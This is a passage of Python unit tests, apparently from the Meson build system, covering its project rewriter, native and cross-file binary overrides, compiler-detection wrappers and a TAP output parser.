# While dir is an external command on both Windows and Linux,
# it certainly isn't python
with self.assertRaises(unittest.SkipTest):
self.init(testdir, extra_args=['-Dpython=dir'])
self.wipe()
class RewriterTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.maxDiff = None
def prime(self, dirname):
copy_tree(os.path.join(self.rewrite_test_dir, dirname), self.builddir)
def rewrite_raw(self, directory, args):
if isinstance(args, str):
args = [args]
command = self.rewrite_command + ['--verbose', '--skip', '--sourcedir', directory] + args
p = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
universal_newlines=True, timeout=60)
print('STDOUT:')
print(p.stdout)
print('STDERR:')
print(p.stderr)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
if not p.stderr:
return {}
return json.loads(p.stderr)
def rewrite(self, directory, args):
if isinstance(args, str):
args = [args]
return self.rewrite_raw(directory, ['command'] + args)
def test_target_source_list(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_add_sources(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['a5.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['a5.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['a3.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp', 'a4.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
}
}
self.assertDictEqual(out, expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, expected)
def test_target_add_sources_abs(self):
self.prime('1 basic')
abs_src = [os.path.join(self.builddir, x) for x in ['a1.cpp', 'a2.cpp', 'a6.cpp']]
add = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "src_add", "sources": abs_src}])
inf = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "info"}])
self.rewrite(self.builddir, add)
out = self.rewrite(self.builddir, inf)
expected = {'target': {'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']}}}
self.assertDictEqual(out, expected)
def test_target_remove_sources(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'rmSrc.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileC.cpp', 'main.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp']},
}
}
self.assertDictEqual(out, expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, expected)
def test_target_subdir(self):
self.prime('2 subdirs')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
expected = {'name': 'something', 'sources': ['first.c', 'second.c', 'third.c']}
self.assertDictEqual(list(out['target'].values())[0], expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(list(out['target'].values())[0], expected)
def test_target_remove(self):
self.prime('1 basic')
self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_tatrget_add(self):
self.prime('1 basic')
self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog10@sha': {'name': 'trivialprog10', 'sources': ['new1.cpp', 'new2.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_remove_subdir(self):
self.prime('2 subdirs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, {})
def test_target_add_subdir(self):
self.prime('2 subdirs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {'name': 'something', 'sources': ['first.c', 'second.c']}
self.assertDictEqual(out['target']['94b671c@@something@exe'], expected)
def test_target_source_sorting(self):
self.prime('5 sorting')
add_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'src_add', 'sources': ['a666.c']}])
inf_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'info'}])
out = self.rewrite(self.builddir, add_json)
out = self.rewrite(self.builddir, inf_json)
expected = {
'target': {
'exe1@exe': {
'name': 'exe1',
'sources': [
'aaa/a/a1.c',
'aaa/b/b1.c',
'aaa/b/b2.c',
'aaa/f1.c',
'aaa/f2.c',
'aaa/f3.c',
'bbb/a/b1.c',
'bbb/b/b2.c',
'bbb/c1/b5.c',
'bbb/c2/b7.c',
'bbb/c10/b6.c',
'bbb/a4.c',
'bbb/b3.c',
'bbb/b4.c',
'bbb/b5.c',
'a1.c',
'a2.c',
'a3.c',
'a10.c',
'a20.c',
'a30.c',
'a100.c',
'a101.c',
'a110.c',
'a210.c',
'a666.c',
'b1.c',
'c2.c'
]
}
}
}
self.assertDictEqual(out, expected)
def test_target_same_name_skip(self):
self.prime('4 same name targets')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {'name': 'myExe', 'sources': ['main.cpp']}
self.assertEqual(len(out['target']), 2)
for val in out['target'].values():
self.assertDictEqual(expected, val)
def test_kwargs_info(self):
self.prime('3 kwargs')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_set(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'set.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.2', 'meson_version': '0.50.0', 'license': ['GPL', 'MIT']},
'target#tgt1': {'build_by_default': False, 'build_rpath': '/usr/local', 'dependencies': 'dep1'},
'dependency#dep1': {'required': True, 'method': 'cmake'}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_add(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'add.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'license': ['GPL', 'MIT', 'BSD']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_remove(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'remove.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'license': 'GPL'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_remove_regex(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'remove_regex.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=true']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_delete(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'delete.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {},
'target#tgt1': {},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_default_options_set(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_set.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=True', 'cpp_std=c++11']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_default_options_delete(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_delete.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['cpp_std=c++14', 'debug=true']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
class NativeFileTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.testcase = os.path.join(self.unit_test_dir, '47 native file binary')
self.current_config = 0
self.current_wrapper = 0
def helper_create_native_file(self, values):
"""Create a config file as a temporary file.
values should be a nested dictionary structure of {section: {key:
value}}
"""
filename = os.path.join(self.builddir, 'generated{}.config'.format(self.current_config))
self.current_config += 1
with open(filename, 'wt') as f:
for section, entries in values.items():
f.write('[{}]\n'.format(section))
for k, v in entries.items():
f.write("{}='{}'\n".format(k, v))
return filename
def helper_create_binary_wrapper(self, binary, dir_=None, extra_args=None, **kwargs):
"""Creates a wrapper around a binary that overrides specific values."""
filename = os.path.join(dir_ or self.builddir, 'binary_wrapper{}.py'.format(self.current_wrapper))
extra_args = extra_args or {}
self.current_wrapper += 1
if is_haiku():
chbang = '#!/bin/env python3'
else:
chbang = '#!/usr/bin/env python3'
with open(filename, 'wt') as f:
f.write(textwrap.dedent('''\
{}
import argparse
import subprocess
import sys
def main():
parser = argparse.ArgumentParser()
'''.format(chbang)))
for name in chain(extra_args, kwargs):
f.write(' parser.add_argument("-{0}", "--{0}", action="store_true")\n'.format(name))
f.write(' args, extra_args = parser.parse_known_args()\n')
for name, value in chain(extra_args.items(), kwargs.items()):
f.write(' if args.{}:\n'.format(name))
f.write(' print("{}", file=sys.{})\n'.format(value, kwargs.get('outfile', 'stdout')))
f.write(' sys.exit(0)\n')
f.write(textwrap.dedent('''
ret = subprocess.run(
["{}"] + extra_args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
print(ret.stdout.decode('utf-8'))
print(ret.stderr.decode('utf-8'), file=sys.stderr)
sys.exit(ret.returncode)
if __name__ == '__main__':
main()
'''.format(binary)))
if not is_windows():
os.chmod(filename, 0o755)
return filename
# On windows we need yet another level of indirection, as cmd cannot
# invoke python files itself, so instead we generate a .bat file, which
# invokes our python wrapper
batfile = os.path.join(self.builddir, 'binary_wrapper{}.bat'.format(self.current_wrapper))
with open(batfile, 'wt') as f:
f.write(r'@{} {} %*'.format(sys.executable, filename))
return batfile
def helper_for_compiler(self, lang, cb, for_machine = MachineChoice.HOST):
"""Helper for generating tests for overriding compilers for langaugages
with more than one implementation, such as C, C++, ObjC, ObjC++, and D.
"""
env = get_fake_env()
getter = getattr(env, 'detect_{}_compiler'.format(lang))
getter = functools.partial(getter, for_machine)
cc = getter()
binary, newid = cb(cc)
env.binaries[for_machine].binaries[lang] = binary
compiler = getter()
self.assertEqual(compiler.id, newid)
def test_multiple_native_files_override(self):
wrapper = self.helper_create_binary_wrapper('bash', version='foo')
config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
wrapper = self.helper_create_binary_wrapper('bash', version='12345')
config2 = self.helper_create_native_file({'binaries': {'bash': wrapper}})
self.init(self.testcase, extra_args=[
'--native-file', config, '--native-file', config2,
'-Dcase=find_program'])
# This test hangs on cygwin.
@unittest.skipIf(os.name != 'posix' or is_cygwin(), 'Uses fifos, which are not available on non Unix OSes.')
def test_native_file_is_pipe(self):
fifo = os.path.join(self.builddir, 'native.file')
os.mkfifo(fifo)
with tempfile.TemporaryDirectory() as d:
wrapper = self.helper_create_binary_wrapper('bash', d, version='12345')
def filler():
with open(fifo, 'w') as f:
f.write('[binaries]\n')
f.write("bash = '{}'\n".format(wrapper))
thread = threading.Thread(target=filler)
thread.start()
self.init(self.testcase, extra_args=['--native-file', fifo, '-Dcase=find_program'])
thread.join()
os.unlink(fifo)
self.init(self.testcase, extra_args=['--wipe'])
def test_multiple_native_files(self):
wrapper = self.helper_create_binary_wrapper('bash', version='12345')
config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
wrapper = self.helper_create_binary_wrapper('python')
config2 = self.helper_create_native_file({'binaries': {'python': wrapper}})
self.init(self.testcase, extra_args=[
'--native-file', config, '--native-file', config2,
'-Dcase=find_program'])
def _simple_test(self, case, binary, entry=None):
wrapper = self.helper_create_binary_wrapper(binary, version='12345')
config = self.helper_create_native_file({'binaries': {entry or binary: wrapper}})
self.init(self.testcase, extra_args=['--native-file', config, '-Dcase={}'.format(case)])
def test_find_program(self):
self._simple_test('find_program', 'bash')
def test_config_tool_dep(self):
# Do the skip at this level to avoid screwing up the cache
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with LLVM on MSYS2')
if not shutil.which('llvm-config'):
raise unittest.SkipTest('No llvm-installed, cannot test')
self._simple_test('config_dep', 'llvm-config')
def test_python3_module(self):
self._simple_test('python3', 'python3')
def test_python_module(self):
if is_windows():
# Bat adds extra crap to stdout, so the version check logic in the
# python module breaks. This is fine on other OSes because they
# don't need the extra indirection.
raise unittest.SkipTest('bat indirection breaks internal sanity checks.')
elif is_osx():
binary = 'python'
else:
binary = 'python2'
# We not have python2, check for it
for v in ['2', '2.7', '-2.7']:
rc = subprocess.call(['pkg-config', '--cflags', 'python{}'.format(v)],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
if rc == 0:
break
else:
raise unittest.SkipTest('Not running Python 2 tests because dev packages not installed.')
self._simple_test('python', binary, entry='python')
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CC')
def test_c_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('c', cb)
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CXX')
def test_cpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('cpp', cb)
@skip_if_not_language('objc')
@skip_if_env_set('OBJC')
def test_objc_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('objc', cb)
@skip_if_not_language('objcpp')
@skip_if_env_set('OBJCXX')
def test_objcpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('objcpp', cb)
@skip_if_not_language('d')
@skip_if_env_set('DC')
def test_d_compiler(self):
def cb(comp):
if comp.id == 'dmd':
if shutil.which('ldc'):
return 'ldc', 'ldc'
elif shutil.which('gdc'):
return 'gdc', 'gdc'
else:
raise unittest.SkipTest('No alternative dlang compiler found.')
if shutil.which('dmd'):
return 'dmd', 'dmd'
raise unittest.SkipTest('No alternative dlang compiler found.')
self.helper_for_compiler('d', cb)
@skip_if_not_language('cs')
@skip_if_env_set('CSC')
def test_cs_compiler(self):
def cb(comp):
if comp.id == 'csc':
if not shutil.which('mcs'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'mcs', 'mcs'
if not shutil.which('csc'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'csc', 'csc'
self.helper_for_compiler('cs', cb)
@skip_if_not_language('fortran')
@skip_if_env_set('FC')
def test_fortran_compiler(self):
def cb(comp):
if comp.id == 'lcc':
if shutil.which('lfortran'):
return 'lfortran', 'lcc'
raise unittest.SkipTest('No alternate Fortran implementation.')
elif comp.id == 'gcc':
if shutil.which('ifort'):
# There is an ICC for windows (windows build, linux host),
# but we don't support that ATM so lets not worry about it.
if is_windows():
return 'ifort', 'intel-cl'
return 'ifort', 'intel'
elif shutil.which('flang'):
return 'flang', 'flang'
elif shutil.which('pgfortran'):
return 'pgfortran', 'pgi'
# XXX: there are several other fortran compilers meson
# supports, but I don't have any of them to test with
raise unittest.SkipTest('No alternate Fortran implementation.')
if not shutil.which('gfortran'):
raise unittest.SkipTest('No alternate Fortran implementation.')
return 'gfortran', 'gcc'
self.helper_for_compiler('fortran', cb)
def _single_implementation_compiler(self, lang, binary, version_str, version):
"""Helper for languages with a single (supported) implementation.
Builds a wrapper around the compiler to override the version.
"""
wrapper = self.helper_create_binary_wrapper(binary, version=version_str)
env = get_fake_env()
getter = getattr(env, 'detect_{}_compiler'.format(lang))
getter = functools.partial(getter, MachineChoice.HOST)
env.binaries.host.binaries[lang] = wrapper
compiler = getter()
self.assertEqual(compiler.version, version)
@skip_if_not_language('vala')
@skip_if_env_set('VALAC')
def test_vala_compiler(self):
self._single_implementation_compiler(
'vala', 'valac', 'Vala 1.2345', '1.2345')
@skip_if_not_language('rust')
@skip_if_env_set('RUSTC')
def test_rust_compiler(self):
self._single_implementation_compiler(
'rust', 'rustc', 'rustc 1.2345', '1.2345')
@skip_if_not_language('java')
def test_java_compiler(self):
self._single_implementation_compiler(
'java', 'javac', 'javac 9.99.77', '9.99.77')
@skip_if_not_language('swift')
def test_swift_compiler(self):
wrapper = self.helper_create_binary_wrapper(
'swiftc', version='Swift 1.2345', outfile='stderr',
extra_args={'Xlinker': 'macosx_version. PROJECT:ld - 1.2.3'})
env = get_fake_env()
env.binaries.host.binaries['swift'] = wrapper
compiler = env.detect_swift_compiler(MachineChoice.HOST)
self.assertEqual(compiler.version, '1.2345')
def test_native_file_dirs(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile')])
def test_native_file_dirs_overriden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib'])
def test_compile_sys_path(self):
"""Compiling with a native file stored in a system path works.
There was a bug which caused the paths to be stored incorrectly and
would result in ninja invoking meson in an infinite loop. This tests
for that by actually invoking ninja.
"""
testcase = os.path.join(self.common_test_dir, '1 trivial')
# It really doesn't matter what's in the native file, just that it exists
config = self.helper_create_native_file({'binaries': {'bash': 'false'}})
self.init(testcase, extra_args=['--native-file', config])
self.build()
class CrossFileTests(BasePlatformTests):
"""Tests for cross file functionality not directly related to
cross compiling.
This is mainly aimed to testing overrides from cross files.
"""
def test_cross_file_dirs(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'-Ddef_bindir=binbar',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libdir=libbar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_cross_file_dirs_overriden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib',
'-Ddef_bindir=binbar',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_cross_file_dirs_chain(self):
# crossfile2 overrides crossfile overrides nativefile
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'--cross-file', os.path.join(testcase, 'crossfile2'),
'-Ddef_bindir=binbar2',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libdir=libbar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
class TAPParserTests(unittest.TestCase):
def assert_test(self, events, **kwargs):
if 'explanation' not in kwargs:
kwargs['explanation'] = None
self.assertEqual(next(events), TAPParser.Test(**kwargs))
def assert_plan(self, events, **kwargs):
if 'skipped' not in kwargs:
kwargs['skipped'] = False
if 'explanation' not in kwargs:
kwargs['explanation'] = None
self.assertEqual(next(events), TAPParser.Plan(**kwargs))
def assert_version(self, events, **kwargs):
self.assertEqual(next(events), TAPParser.Version(**kwargs))
def assert_error(self, events):
self.assertEqual(type(next(events)), TAPParser.Error)
def assert_bailout(self, events, **kwargs):
self.assertEqual(next(events), TAPParser.Bailout(**kwargs))
def assert_last(self, events):
with self.assertRaises(StopIteration):
next(events)
def parse_tap(self, s):
parser = TAPParser(io.StringIO(s))
return iter(parser.parse())
def parse_tap_v13(self, s):
events = self.parse_tap('TAP version 13\n' + s)
self.assert_version(events, version=13)
return events
def test_empty(self):
events = self.parse_tap('')
self.assert_last(events)
def test_empty_plan(self):
events = self.parse_tap('1..0')
self.assert_plan(events, count=0, late=False, skipped=True)
self.assert_last(events)
def test_plan_directive(self):
events = self.parse_tap('1..0 # skipped for some reason')
self.assert_plan(events, count=0, late=False, skipped=True,
explanation='for some reason')
self.assert_last(events)
events = self.parse_tap('1..1 # skipped for some reason\nok 1')
self.assert_error(events)
self.assert_plan(events, count=1, late=False, skipped=True,
explanation='for some reason')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('1..1 # todo not supported here\nok 1')
self.assert_error(events)
self.assert_plan(events, count=1, late=False, skipped=False,
explanation='not supported here')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_ok(self):
events = self.parse_tap('ok')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_with_number(self):
events = self.parse_tap('ok 1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_with_name(self):
events = self.parse_tap('ok 1 abc')
self.assert_test(events, number=1, name='abc', result=TestResult.OK)
self.assert_last(events)
def test_one_test_not_ok(self):
events = self.parse_tap('not ok')
self.assert_test(events, number=1, name='', result=TestResult.FAIL)
self.assert_last(events)
def test_one_test_todo(self):
events = self.parse_tap('not ok 1 abc # TODO')
self.assert_test(events, number=1, name='abc', result=TestResult.EXPECTEDFAIL)
self.assert_last(events)
events = self.parse_tap('ok 1 abc # TODO')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
self.assert_last(events)
def test_one_test_skip(self):
events = self.parse_tap('ok 1 abc # SKIP')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
self.assert_last(events)
def test_one_test_skip_failure(self):
events = self.parse_tap('not ok 1 abc # SKIP')
self.assert_test(events, number=1, name='abc', result=TestResult.FAIL)
self.assert_last(events)
def test_many_early_plan(self):
events = self.parse_tap('1..4\nok 1\nnot ok 2\nok 3\nnot ok 4')
self.assert_plan(events, count=4, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_test(events, number=3, name='', result=TestResult.OK)
self.assert_test(events, number=4, name='', result=TestResult.FAIL)
self.assert_last(events)
def test_many_late_plan(self):
events = self.parse_tap('ok 1\nnot ok 2\nok 3\nnot ok 4\n1..4')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
